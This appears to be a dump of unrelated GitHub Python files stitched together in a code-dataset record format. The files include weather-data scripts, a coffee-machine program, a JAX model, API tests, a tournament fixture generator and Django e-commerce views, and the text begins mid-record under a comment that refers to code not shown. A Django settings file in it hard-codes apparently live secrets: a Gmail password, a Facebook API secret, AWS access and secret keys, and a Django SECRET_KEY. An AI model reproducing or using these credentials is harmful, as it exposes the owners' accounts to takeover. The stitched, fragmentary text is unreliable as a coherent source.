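# The Code Jam entry above patches digits in place with nested loops; the
# usual "tidy numbers" approach (an alternative sketch, not the submitted
# solution) finds the first descending pair, borrows one, and fills with 9s:
def tidy(n: int) -> int:
    digits = list(str(n))
    i = 1
    while i < len(digits):
        if digits[i - 1] > digits[i]:
            digits[i - 1] = str(int(digits[i - 1]) - 1)
            digits[i:] = "9" * (len(digits) - i)
            i = max(i - 1, 1)  # re-check: the borrow may break an earlier pair
        else:
            i += 1
    return int("".join(digits))

assert tidy(132) == 129 and tidy(1000) == 999 and tidy(332) == 299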
for row in reader:\n nrow+=1\n if nrow==2:\n lng=float(row[1])\n lngs.append(lng)\n elif nrow==3:\n lat=float(row[1])\n lats.append(lat)\n else:\n continue\n if n==1:\n for ourstate in ourstates:\n if point_in_poly(Point(lng,lat), states[ourstate].poly):\n print(ourstate)\n statename=ourstate\n else:\n break\n\nmove=0\nfor name in glob.glob('unknown\\\\*.csv'):\n pure_name=name.split('\\\\')[-1]\n #print(pure_name)\n if not os.path.isfile(info[\"statedata\"]+\"\\\\\"+statename+\"\\\\\"+pure_name):\n move+=1\n if move%500==0:\n print('moving files',str(move))\n shutil.copyfile(name,info[\"statedata\"]+\"\\\\\"+statename+\"\\\\\"+pure_name)","repo_name":"qingninglily/WeatherRiskManagement","sub_path":"statesintofolders_wind.py","file_name":"statesintofolders_wind.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"25846137600","text":"from phml.compiler.steps.base import scoped_step\nfrom phml.nodes import Element, Parent\n\n\n@scoped_step\ndef step_replace_phml_wrapper(node: Parent, *_):\n for child in list(node):\n if isinstance(child, Element) and child.tag in [\"\", \"Template\"]:\n idx = node.index(child)\n for c in child:\n if isinstance(c, Element):\n c.context.update(child.context)\n\n del node[idx]\n node.insert(idx, child.children or [])\n","repo_name":"Tired-Fox/phml","sub_path":"phml/compiler/steps/wrapper.py","file_name":"wrapper.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"1287554012","text":"from menu import *\n\nstart = True\ncost = 0\n\ndef enough_resources(order_resources):\n for item in order_resources:\n if order_resources[item] > resources[item]:\n print(f\"Sorry there is not enough {item}.\")\n return False\n return True\n\ndef process_coins():\n print(\"Please insert coins.\")\n total = int(input(\"How many quarters?: \")) * 0.25\n total += int(input(\"How many dimes?: \")) * 0.1\n total += int(input(\"How many nickles?: \")) * 0.05\n total += int(input(\"How many pennies?: \")) * 0.01\n return total\n\ndef transaction_successful(money, cost_coffee):\n if money >= cost_coffee:\n change = round(money - cost_coffee, 2)\n print(f\"Here is ${change} in change.\")\n global cost\n cost += cost_coffee\n return True\n else:\n print(\"Sorry that's not enough money.\")\n return False\n\n\ndef make_coffee(drink_name, order_resources):\n for item in order_resources:\n resources[item] -= order_resources[item]\n print(f\"Here is your {drink_name} ☕ \")\n\nwhile start:\n choice = input(\"What you would like? 
(espresso/latte/cappuccino): \")\n if choice == \"off\":\n start = False\n elif choice == \"report\":\n print(f\"Water: {resources['water']}ml\")\n print(f\"Milk: {resources['milk']}ml\")\n print(f\"Coffee: {resources['coffee']}g\")\n print(f\"Money: {cost}$\")\n else:\n drink = MENU[choice]\n if enough_resources(drink[\"ingredients\"]):\n payment = process_coins()\n if transaction_successful(payment, drink[\"cost\"]):\n make_coffee(choice, drink[\"ingredients\"])\n\n\n\n\n\n","repo_name":"despoina77/100projects","sub_path":"Coffee_Machine/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16720035597","text":"# Django settings for fratevents project.\nimport os, os.path, social_auth\n\nif os.environ.has_key('DATABASE_URL'):\n DEBUG = True\nelse:\n DEBUG = True\nTEMPLATE_DEBUG = DEBUG\n\nADMINS = (\n ('Sanchit Bareja', 'sanchitbareja@gmail.com'),\n)\n\nMANAGERS = ADMINS\n\nif os.environ.has_key('DATABASE_URL'):\n import dj_database_url\n DATABASES = {'default': dj_database_url.config(default='postgres://localhost')}\nelse:\n DATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.\n 'NAME': 'fratevents', # Or path to database file if using sqlite3.\n 'USER': 'postgres', # Not used with sqlite3.\n 'PASSWORD': 'root', # Not used with sqlite3.\n 'HOST': 'localhost', # Set to empty string for localhost. Not used with sqlite3.\n 'PORT': '', # Set to empty string for default. Not used with sqlite3.\n }\n }\n\n# Local time zone for this installation. Choices can be found here:\n# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name\n# although not all choices may be available on all operating systems.\n# On Unix systems, a value of None will cause Django to use the same\n# timezone as the operating system.\n# If running in a Windows environment this must be set to the same as your\n# system time zone.\nTIME_ZONE = 'America/Los_Angeles'\n\n# Language code for this installation. All choices can be found here:\n# http://www.i18nguy.com/unicode/language-identifiers.html\nLANGUAGE_CODE = 'en-us'\n\nSITE_ID = 1\n\n# If you set this to False, Django will make some optimizations so as not\n# to load the internationalization machinery.\nUSE_I18N = True\n\n# If you set this to False, Django will not format dates, numbers and\n# calendars according to the current locale.\nUSE_L10N = True\n\n# If you set this to False, Django will not use timezone-aware datetimes.\nUSE_TZ = False\n\n# Absolute filesystem path to the directory that will hold user-uploaded files.\n# Example: \"/home/media/media.lawrence.com/media/\"\nMEDIA_ROOT = ''\n\n# URL that handles the media served from MEDIA_ROOT. 
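# process_coins above totals US coin denominations; a quick worked check with
# hypothetical amounts (2 quarters, 3 dimes, 1 nickel, 4 pennies):
total = 2 * 0.25 + 3 * 0.10 + 1 * 0.05 + 4 * 0.01
assert round(total, 2) == 0.89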
Make sure to use a\n# trailing slash.\n# Examples: \"http://media.lawrence.com/media/\", \"http://example.com/media/\"\nMEDIA_URL = '/static/'\n\nSEND_BROKEN_LINK_EMAILS = True\n\n# Absolute path to the directory static files should be collected to.\n# Don't put anything in this directory yourself; store your static files\n# in apps' \"static/\" subdirectories and in STATICFILES_DIRS.\n# Example: \"/home/media/media.lawrence.com/static/\"\nSTATIC_ROOT = '/static/'\n\n# URL prefix for static files.\n# Example: \"http://media.lawrence.com/static/\"\nSTATIC_URL = os.path.join(os.path.dirname(__file__), 'static/').replace('\\\\','/')\n\n# Additional locations of static files\nSTATICFILES_DIRS = (\n # Put strings here, like \"/home/html/static\" or \"C:/www/django/static\".\n # Always use forward slashes, even on Windows.\n # Don't forget to use absolute paths, not relative paths.\n os.path.join(os.path.dirname(__file__), 'static/').replace('\\\\','/'),\n)\n\n# List of finder classes that know how to find static files in\n# various locations.\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n# 'django.contrib.staticfiles.finders.DefaultStorageFinder',\n)\n\n# Make this unique, and don't share it with anybody.\nSECRET_KEY = 'rsx9)l1^_bsmeyipfk9u#t#gdt%@po-i-hr+#8ensmg012!kpn'\n\n# List of callables that know how to import templates from various sources.\nTEMPLATE_LOADERS = (\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n# 'django.template.loaders.eggs.Loader',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'social_auth.middleware.SocialAuthExceptionMiddleware',\n # Uncomment the next line for simple clickjacking protection:\n # 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nROOT_URLCONF = 'fratevents.urls'\n\n# Python dotted path to the WSGI application used by Django's runserver.\nWSGI_APPLICATION = 'fratevents.wsgi.application'\n\nTEMPLATE_DIRS = (\n # Put strings here, like \"/home/html/django_templates\" or \"C:/www/django/templates\".\n # Always use forward slashes, even on Windows.\n # Don't forget to use absolute paths, not relative paths.\n os.path.join(os.path.dirname(__file__), 'views').replace('\\\\','/'),\n)\n\nINSTALLED_APPS = (\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n # Uncomment the next line to enable the admin:\n 'django.contrib.admin',\n # Uncomment the next line to enable admin documentation:\n # 'django.contrib.admindocs',\n 'south',\n 'gunicorn',\n 'events',\n 'clubs',\n 'rage',\n 'userprofile',\n 'social_auth',\n 'storages',\n)\n\n# A sample logging configuration. 
The only tangible logging\n# performed by this configuration is to send an email to\n# the site admins on every HTTP 500 error when DEBUG=False.\n# See http://docs.djangoproject.com/en/dev/topics/logging for\n# more details on how to customize your logging configuration.\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'filters': {\n 'require_debug_false': {\n '()': 'django.utils.log.RequireDebugFalse'\n }\n },\n 'handlers': {\n 'mail_admins': {\n 'level': 'ERROR',\n 'filters': ['require_debug_false'],\n 'class': 'django.utils.log.AdminEmailHandler'\n }\n },\n 'loggers': {\n 'django.request': {\n 'handlers': ['mail_admins'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n }\n}\n\n# EMAIL SETTINGS\nEMAIL_USE_TLS = True\nEMAIL_HOST = 'smtp.gmail.com'\nEMAIL_HOST_USER = 'caleventsinfo@gmail.com'\nEMAIL_HOST_PASSWORD = 'qwaszx12,'\nEMAIL_PORT = 587\n\nEVENT_MASTERS = ['sanchitbareja@gmail.com','hahardikagrawal@gmail.com','caleventsinfo@gmail.com']\n\n# Facebook Integration Settings\nAUTHENTICATION_BACKENDS = (\n 'social_auth.backends.facebook.FacebookBackend',\n 'django.contrib.auth.backends.ModelBackend',\n)\n\n# userprofile creation \nAUTH_PROFILE_MODULE = 'userprofile.UserProfile'\n\nFACEBOOK_APP_ID = '343708889077375'\nFACEBOOK_API_SECRET = '0bd34d3dbb482579fb990805860267bd'\nFACEBOOK_EXTENDED_PERMISSIONS = ['email', 'user_birthday', 'user_interests', 'user_events', 'manage_pages']\n\nTEMPLATE_CONTEXT_PROCESSORS = (\n 'django.contrib.auth.context_processors.auth',\n 'django.core.context_processors.debug',\n 'django.core.context_processors.i18n',\n 'django.core.context_processors.media',\n 'django.contrib.messages.context_processors.messages',\n 'social_auth.context_processors.social_auth_by_type_backends',\n)\n\nLOGIN_REDIRECT_URL = '/'\n\nSOCIAL_AUTH_PIPELINE = (\n 'social_auth.backends.pipeline.social.social_auth_user',\n #'social_auth.backends.pipeline.associate.associate_by_email',\n 'social_auth.backends.pipeline.user.get_username',\n 'social_auth.backends.pipeline.user.create_user',\n 'social_auth.backends.pipeline.social.associate_user',\n 'social_auth.backends.pipeline.social.load_extra_data',\n 'social_auth.backends.pipeline.user.update_user_details',\n 'fratevents.pipeline.create_user_profile',\n 'fratevents.pipeline.get_user_profile_pic',\n 'fratevents.pipeline.get_user_events',\n 'fratevents.pipeline.get_user_network',\n 'fratevents.pipeline.get_user_pages',\n)\n\nSOCIAL_AUTH_CREATE_USERS = True\nSOCIAL_AUTH_FORCE_RANDOM_USERNAME = False\nSOCIAL_AUTH_DEFAULT_USERNAME = 'socialauth_user'\nSOCIAL_AUTH_COMPLETE_URL_NAME = 'socialauth_complete'\nLOGIN_ERROR_URL = '/login/error/'\nSOCIAL_AUTH_ERROR_KEY = 'socialauth_error'\nSOCIAL_AUTH_FORCE_POST_DISCONNECT = True\n\n#AWS S3 Credentials - django-storages\nDEFAULT_FILE_STORAGE = 'storages.backends.s3boto.S3BotoStorage'\nAWS_ACCESS_KEY_ID = 'AKIAISDEISAIY3LRYY3Q'\nAWS_SECRET_ACCESS_KEY = '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'\nAWS_STORAGE_BUCKET_NAME = 'calevents'\nBUCKET_NAME = 'calevents'\nfrom S3 import CallingFormat\nAWS_CALLING_FORMAT = CallingFormat.SUBDOMAIN\nAWS_UPLOAD_DESTINATION = \"http://s3.amazonaws.com/\"+str(BUCKET_NAME)+\"/\"\n","repo_name":"sanchitbareja/fratevents","sub_path":"fratevents/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":8645,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"33506622695","text":"import jax\nimport jax.numpy as jnp\nimport haiku as hk\n\nimport configlib\n\nclass 
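# The settings above hard-code credentials (EMAIL_HOST_PASSWORD, the AWS keys,
# SECRET_KEY) in source. A common alternative, shown here only as a hedged
# sketch and not as a change made to the original project, reads them from the
# environment:
import os

SECRET_KEY = os.environ.get("SECRET_KEY", "")
EMAIL_HOST_PASSWORD = os.environ.get("EMAIL_HOST_PASSWORD", "")
AWS_ACCESS_KEY_ID = os.environ.get("AWS_ACCESS_KEY_ID", "")
AWS_SECRET_ACCESS_KEY = os.environ.get("AWS_SECRET_ACCESS_KEY", "")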
MainModel(hk.Module):\n    def __init__(self, config: configlib.Config):\n        super().__init__()\n        self.config = config\n        self.latent_dim = config.latent_dim\n        self.decoder_output_dim = config.decoder_output_dim\n        \n        if config.activation == \"relu\":\n            self.activation = jax.nn.relu\n        elif config.activation == \"leaky_relu\":\n            self.activation = lambda x: jax.nn.leaky_relu(x, negative_slope=config.negative_slope)\n        elif config.activation == \"tanh\":\n            self.activation = jnp.tanh\n        elif config.activation == \"elu\":\n            self.activation = lambda x: jax.nn.elu(x, alpha=config.elu_alpha)\n        else:\n            raise NotImplementedError\n\n","repo_name":"amir-sabzi/DP_VAE","sub_path":"models/MainModel.py","file_name":"MainModel.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11829577808","text":"'''\n@Created by yuhsiang\n@Date : 2018/12/7\n'''\n\nimport time\nimport unittest\n\nfrom parameterized import parameterized\nfrom data_config.system_config import systemSetting\nfrom base.HTMLTestReportCN import HTMLTestRunner\nfrom base.httpRequest import HttpRequest\nfrom data_config import master_config\nfrom master_api import member_and_agent\nfrom master_api.account_login import User\n\n\nclass FixVerifyAuditTypeField(unittest.TestCase):\n    \"\"\"Verify the display logic of the deposit audit type in real-time auditing.\"\"\"\n\n    def setUp(self):\n        self.config = systemSetting()  # system parameters\n        self.__http = HttpRequest()\n        self.user = User(self.__http)\n        self.memberSearch = member_and_agent.MemberSearch(self.__http)\n        self.memberDeposit = member_and_agent.MemberDeposit(self.__http)\n        self.user.login()\n\n    def tearDown(self):\n        self.user.logout()\n\n    @parameterized.expand([\n        # No audit - discount amount\n        (\"verify_audit_type_field\", \"None\", 5),\n        (\"verify_audit_type_field\", \"None\", 6),\n        # Deposit audit - deposit amount\n        (\"verify_audit_type_field\", \"Deposit\", 5),\n        (\"verify_audit_type_field\", \"Deposit\", 6),\n        # Discount audit - discount amount\n        (\"verify_audit_type_field\", \"Discount\", 5),\n        (\"verify_audit_type_field\", \"Discount\", 6),\n    ])\n    def testCase(self, name, audit_type, select_type):\n        # Parameters: test case name, audit method, transaction type\n        # Step 1: get the token for a manual deposit\n        response_data = self.memberDeposit.deposit_token({})\n\n        # Step 2: call the manual deposit API\n        data = {\"AccountsString\": self.config.test_Member_config(),\n                \"AmountString\": \"1\",\n                \"AuditType\": audit_type,\n                \"Audit\": 0.01,\n                \"Type\": select_type,\n                \"IsReal\": 'false',\n                \"Memo\": \"test\",\n                \"PortalMemo\": \"\",\n                \"Password\": \"123456\",\n                \"DepositToken\": response_data[1],\n                \"TimeStamp\": time.time()}\n        self.submit = self.memberDeposit.deposit_submit(data)\n\n        # Step 3: get the account's current real-time audit details\n        data = {\"account\": self.config.test_Member_config()}\n        response_data = self.memberSearch.get_audit_detail(data)\n        deposit_amount = response_data[1]['WithdrawAuditDataList'][0]['Amount']\n        discount_amount = response_data[1]['WithdrawAuditDataList'][0]['Discount']\n\n        if audit_type == \"None\" and discount_amount is not None:\n            flag_status = True\n        elif audit_type == \"Deposit\" and deposit_amount is not None:\n            flag_status = True\n        elif audit_type == \"Discount\" and discount_amount is not None:\n            flag_status = True\n        else:\n            flag_status = False\n\n        # Step 4: verify the result\n        self.assertEqual(flag_status, True)\n\n\nif __name__ == '__main__':\n    unittest.main(testRunner = 
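# The if/elif chain in MainModel above maps a config string to an activation;
# an equivalent table-driven sketch (hypothetical helper, JAX assumed):
import jax
import jax.numpy as jnp

def make_activation(name, config):
    table = {
        "relu": jax.nn.relu,
        "leaky_relu": lambda x: jax.nn.leaky_relu(x, negative_slope=config.negative_slope),
        "tanh": jnp.tanh,
        "elu": lambda x: jax.nn.elu(x, alpha=config.elu_alpha),
    }
    if name not in table:
        raise NotImplementedError(name)
    return table[name]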
HTMLTestRunner())\n","repo_name":"eos1209/auto_test","sub_path":"case/test_api/test_FlowCase/test_Master_Flow_FixVerifyAuditTypeField.py","file_name":"test_Master_Flow_FixVerifyAuditTypeField.py","file_ext":"py","file_size_in_byte":2919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37210473000","text":"from django.conf.urls import url\n\nfrom .views import dashboard, logout_view, register_view, login_view\n\nurlpatterns = [\n url(r'^dashboard/', dashboard, name=\"index\"),\n url(r'^login/', login_view, name=\"login\"),\n url(r'^register/', register_view, name=\"register\"),\n url(r'^logout/', logout_view, name=\"logout\"),\n]\n","repo_name":"ericabbey/recon","sub_path":"account/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23771275978","text":"# Import for the Desktop Bot\nfrom botcity.core import DesktopBot\n\n# Import for integration with BotCity Maestro SDK\nfrom botcity.maestro import *\n\n# Disable errors if we are not connected to Maestro\nBotMaestroSDK.RAISE_NOT_CONNECTED = False\n\nfrom changeSeparator import change_separator\ndef main():\n # Runner passes the server url, the id of the task being executed,\n # the access token and the parameters that this task receives (when applicable).\n maestro = BotMaestroSDK.from_sys_args()\n ## Fetch the BotExecution with details from the task, including parameters\n execution = maestro.get_execution()\n\n print(f\"Task ID is: {execution.task_id}\")\n print(f\"Task Parameters are: {execution.parameters}\")\n\n bot = DesktopBot()\n change_separator(bot,\".\", \",\")\n bot.wait(2000)\n change_separator(bot,\",\", \".\")\n \n\n \n\n\n\n\n\n\n\n # Implement here your logic...\n ...\n\n # Uncomment to mark this task as finished on BotMaestro\n # maestro.finish_task(\n # task_id=execution.task_id,\n # status=AutomationTaskFinishStatus.SUCCESS,\n # message=\"Task Finished OK.\"\n # )\n\ndef not_found(label):\n print(f\"Element not found: {label}\")\n\n\nif __name__ == '__main__':\n main()","repo_name":"olucascruz/BotChangeFormatNumber","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22461426207","text":"#!/usr/bin/python3\n\nimport random;\nimport countdowntourney;\nimport htmlform;\nimport cgicommon\nimport urllib.request, urllib.parse, urllib.error;\nimport re\nimport fixgen\nimport fixgen_manual\n\nname = \"Raw\"\ndescription = \"You have full control over how many matches are in the round and who plays whom. There are no table groups, and there is no requirement that all players play. 
Use this generator if you want a knockout stage or one-off game.\"\n\nspecial_round_names = {\n \"QF\" : \"Quarter-finals\",\n \"SF\" : \"Semi-finals\",\n \"3P\" : \"Third-place playoff\",\n \"F\" : \"Final\"\n}\n\ndef int_or_none(s):\n try:\n value = int(s)\n return value\n except:\n return None\n\ndef get_user_form(tourney, settings, div_rounds):\n num_divisions = tourney.get_num_divisions()\n div_num_games = dict()\n div_game_types = dict()\n\n players = sorted(tourney.get_active_players(), key=lambda x : x.get_name());\n\n latest_round_no = tourney.get_latest_round_no()\n if latest_round_no is None:\n latest_round_no = 0\n\n prev_settings = settings.get_previous_settings()\n for key in prev_settings:\n if key not in settings and re.match(\"^d[0-9]*_groupsize$\", key):\n settings[key] = prev_settings[key]\n if settings.get(\"submitrestore\", None):\n for key in prev_settings:\n if key not in [\"submit\", \"submitrestore\", \"submitplayers\"]:\n settings[key] = prev_settings[key]\n\n elements = []\n elements.append(htmlform.HTMLFormHiddenInput(\"numgamessubmit\", \"1\"))\n elements.append(htmlform.HTMLFormHiddenInput(\"roundno\", str(latest_round_no + 1)))\n\n # If there's a previously-saved form for this round, offer to load it\n prev_settings = settings.get_previous_settings()\n round_no = int_or_none(prev_settings.get(\"roundno\", None))\n if round_no is not None and round_no == latest_round_no + 1:\n elements.append(htmlform.HTMLFragment(\"
      \"))\n elements.append(htmlform.HTMLFragment(\"
      \"))\n elements.append(htmlform.HTMLFragment(\"\\\"Info\\\"\"))\n elements.append(htmlform.HTMLFragment(\"
      \"))\n elements.append(htmlform.HTMLFragment(\"
      \"))\n elements.append(htmlform.HTMLFragment(\"
      \"))\n elements.append(htmlform.HTMLFragment(\"

      \"))\n elements.append(htmlform.HTMLFragment(\"There is an incomplete fixtures form saved. Do you want to carry on from where you left off?\"))\n elements.append(htmlform.HTMLFragment(\"

      \"))\n elements.append(htmlform.HTMLFragment(\"

      \"))\n elements.append(htmlform.HTMLFormSubmitButton(\"submitrestore\", \"Restore previously-saved form\"))\n elements.append(htmlform.HTMLFragment(\"

      \"))\n elements.append(htmlform.HTMLFragment(\"
      \"))\n\n # When we pass these settings to fixgen_manual, we don't want it asking\n # awkward questions about the number of players in a group when we're\n # fixing at it two, so tell it that's already been submitted.\n settings[\"tablesizesubmit\"] = \"1\"\n\n for div_index in div_rounds:\n num_games_name = \"d%d_num_groups\" % (div_index)\n game_type_name = \"d%d_game_type\" % (div_index)\n\n # For fully-manual, number of players per group is always 2,\n # we're allowed to put a player on more than one table, and there is\n # no requirement that all players play.\n settings[\"d%d_groupsize\" % (div_index)] = \"2\"\n settings[\"d%d_allow_player_repetition\" % (div_index)] = \"1\"\n settings[\"d%d_allow_unselected_players\" % (div_index)] = \"1\"\n\n # Also we want fixgen_manual to show the standings table for each\n # division.\n settings[\"d%d_show_standings\" % (div_index)] = \"1\"\n\n if settings.get(num_games_name, None) is not None:\n try:\n div_num_games[div_index] = int(settings.get(num_games_name))\n if div_num_games[div_index] < 0:\n div_num_games[div_index] = 0\n except ValueError:\n div_num_games[div_index] = 0\n else:\n div_num_games[div_index] = 0\n\n if settings.get(game_type_name, None) is not None:\n try:\n div_game_types[div_index] = settings.get(game_type_name)\n if div_game_types[div_index] in special_round_names:\n settings[\"d%d_round_name\" % (div_index)] = special_round_names[div_game_types[div_index]]\n except ValueError:\n div_game_types[div_index] = None\n\n if num_divisions > 1:\n elements.append(htmlform.HTMLFragment(\"

      %s

      \" % (cgicommon.escape(tourney.get_division_name(div_index)))))\n\n elements.append(htmlform.HTMLFragment(\"
      \"))\n num_games_element = htmlform.HTMLFormNumberInput(\"Number of games to create\", num_games_name, 1, other_attrs={\"min\" : 1})\n elements.append(num_games_element)\n elements.append(htmlform.HTMLFragment(\"
      \"))\n\n elements.append(htmlform.HTMLFragment(\"
      \"))\n elements.append(htmlform.HTMLFragment(\"Create games of this type: \"))\n\n game_type_options = [ htmlform.HTMLFormDropDownOption(x[\"code\"], x[\"name\"] + \" (\" + x[\"code\"] + \")\") for x in countdowntourney.get_game_types() ]\n type_element = htmlform.HTMLFormDropDownBox(\"d%d_game_type\" % (div_index), game_type_options)\n\n current_setting = settings.get(\"d%d_game_type\" % (div_index))\n if current_setting:\n type_element.set_value(current_setting)\n elements.append(type_element)\n elements.append(htmlform.HTMLFragment(\"
      \"))\n\n num_games_total = sum( [ div_num_games[x] for x in div_num_games ] )\n\n if num_games_total == 0 or not(settings.get(\"numgamessubmit\", \"\")):\n elements.append(htmlform.HTMLFragment(\"
      \"))\n elements.append(htmlform.HTMLFormSubmitButton(\"submit\", \"Continue\"))\n elements.append(htmlform.HTMLFragment(\"
      \"))\n return htmlform.HTMLForm(\"POST\", \"/cgi-bin/fixturegen.py?tourney=%s\" % (urllib.parse.quote_plus(tourney.name)), elements)\n else:\n return fixgen_manual.get_user_form(tourney, settings, div_rounds)\n\ndef check_ready(tourney, div_rounds):\n for div in div_rounds:\n round_no = div_rounds[div]\n existing_games = tourney.get_games(round_no=round_no, division=div)\n if existing_games:\n return (False, \"%s: round %d already has %d games in it.\" % (tourney.get_division_name(div), round_no, len(existing_games)))\n return (True, None)\n\ndef generate(tourney, settings, div_rounds):\n return fixgen_manual.generate(tourney, settings, div_rounds, check_ready)\n\ndef save_form_on_submit():\n return True\n","repo_name":"elocemearg/atropine","sub_path":"generators/fixgen_raw.py","file_name":"fixgen_raw.py","file_ext":"py","file_size_in_byte":6876,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"4228770300","text":"from .serializers import OrderSerializer\nfrom .models import Order\nfrom rest_framework.viewsets import ModelViewSet\nfrom rest_framework.generics import ListAPIView, RetrieveAPIView\nfrom rest_framework.authentication import TokenAuthentication\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.filters import SearchFilter,OrderingFilter\nfrom django_filters.rest_framework import DjangoFilterBackend\nfrom user.permissions import IsAdminUser\nfrom rest_framework.views import APIView\nfrom backend_greenie.utils.response_formatting import FormattedResponse\nfrom .model_helpers import StatusType\nfrom user.models import DeleveryAddress\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom product.models import Product\nfrom django.db.models import Q\nfrom django.db.models import Prefetch\nfrom order.models import Purchase\nfrom user.serializers import DeleveryAddressSerializer\nfrom user.model_helpers import AddressType\n\nfrom integeration.braintree.braintree_main import BrainTreeMain\nbt = BrainTreeMain()\ntoken = bt.gateway.client_token.generate()\n# print(token)\nclass OrderListView(ListAPIView):\n \"\"\"\n List of orders.\n \"\"\"\n authentication_classes = (TokenAuthentication,)\n permission_classes = (IsAuthenticated, )\n\n serializer_class = OrderSerializer\n filter_backends = [DjangoFilterBackend, SearchFilter]\n filterset_fields = ['id','user','product__name', 'product__category__name', 'status']\n search_fields = ['user__name', 'product__name', 'product__category__name']\n\n page_size = 20\n\n def get_queryset(self):\n user = self.request.user\n greenie_user = user.greenie_user\n\n if self.request.query_params.get('status', None):\n status_vals = self.request.query_params.get('status').split(',')\n orders = Order.objects.filter(status__in = status_vals, user=greenie_user).order_by('-modified')\n else :\n orders = Order.objects.filter(is_active=True).order_by('-modified')\n\n return orders\n\n def list(self, request, *args, **kwargs):\n # call the original 'list' to get the original response\n response = super(OrderListView, self).list(request, *args, **kwargs)\n\n return FormattedResponse(response.data)\n\nclass OrderDetailView(RetrieveAPIView):\n \"\"\"\n Order detail: Single object\n \"\"\"\n uthentication_classes = (TokenAuthentication,)\n permission_classes = (IsAuthenticated, )\n queryset = Order.objects.filter(is_active=True)\n serializer_class = OrderSerializer\n lookup_field = 'id'\n\n def get(self, request, *args, **kwargs):\n data = super(OrderDetailView, 
self).get(request, *args, **kwargs)\n return FormattedResponse(msg='Order Data Fetch successully.', data=data.data).create()\n\nclass CartView(APIView):\n \"\"\"\n Add to card.\n Remove From Cart\n Get Cart Items.\n \"\"\"\n authentication_classes = (TokenAuthentication,)\n permission_classes = (IsAuthenticated, )\n\n def post(self, request, format=None):\n user = request.user\n greenie_user = user.greenie_user\n product = request.data['product_id']\n keep_in_cart = request.data['is_add'] # add or remove item from cart\n\n try:\n product = Product.objects.get(id=product)\n except ObjectDoesNotExist:\n return FormattedResponse(error=True, msg='Product not exist.', data={}).create() \n if keep_in_cart:\n Order.objects.create(user=greenie_user, product=product, status=StatusType.ADDED_TO_CART)\n query_data = Order.objects.filter(user=greenie_user, is_active=True, status=StatusType.ADDED_TO_CART)\n response_data = OrderSerializer(query_data, many=True).data\n return FormattedResponse(msg='Added to Cart Successfully.', data=response_data).create()\n else:\n orders = Order.objects.filter(user=greenie_user, is_active=True, status=StatusType.ADDED_TO_CART)\n current_product_in_cart = orders.filter(product=product)\n if len(current_product_in_cart):\n order = current_product_in_cart.latest('modified')\n order.status = StatusType.VIEWED\n order.save()\n response_data = OrderSerializer(orders, many=True).data\n return FormattedResponse(msg='Removed from cart', data=response_data).create()\n\n def get(self, request, format=None):\n user = request.user\n greenie_user = user.greenie_user\n query_data = Order.objects.filter(user=greenie_user, is_active=True, status=StatusType.ADDED_TO_CART)\n response_data = OrderSerializer(query_data, many=True).data\n return FormattedResponse(msg='Cart fetched.', data=response_data).create()\n\nclass CreateOrderView(APIView):\n \"\"\"\n create an order.\n \"\"\"\n authentication_classes = (TokenAuthentication,)\n permission_classes = (IsAuthenticated, )\n\n def post(self, request, format=None):\n user = request.user\n greenie_user = user.greenie_user\n # body : {\"products\": {\"id1\": 2, \"id2\": 3}}\n is_order_through_cart = request.data['is_order_through_cart']\n address = request.data['address_id']\n \n try:\n address_obj = DeleveryAddress.objects.get(id =address)\n except ObjectDoesNotExist:\n return FormattedResponse(error=True, msg='First Add Delevery Address.').create()\n\n if not is_order_through_cart:\n products = request.data.get('products')\n products_query = Product.objects.filter(id__in=products.keys())\n if len(products_query) != len(products):\n return FormattedResponse(error=True, msg=\"All Product must exist.\").create()\n\n for product in products_query:\n for _ in range(products[product]):\n order_obj = Order.objects.create(user=greenie_user, product=product, status = StatusType.PAYMENT_PENDING)\n else:\n orders = Order.objects.filter(user=greenie_user, status=StatusType.ADDED_TO_CART, is_active=True)\n for order in orders:\n order.status = StatusType.PAYMENT_PENDING\n order.save()\n \n # TODO: First get payment \n # Create Txn \n # Mark order completed\n orders = Order.objects.filter(user=greenie_user, status=StatusType.PAYMENT_PENDING, is_active=True)\n response_data = OrderSerializer(orders, many=True).data\n return FormattedResponse(msg='Orders Awaiting payment.', 
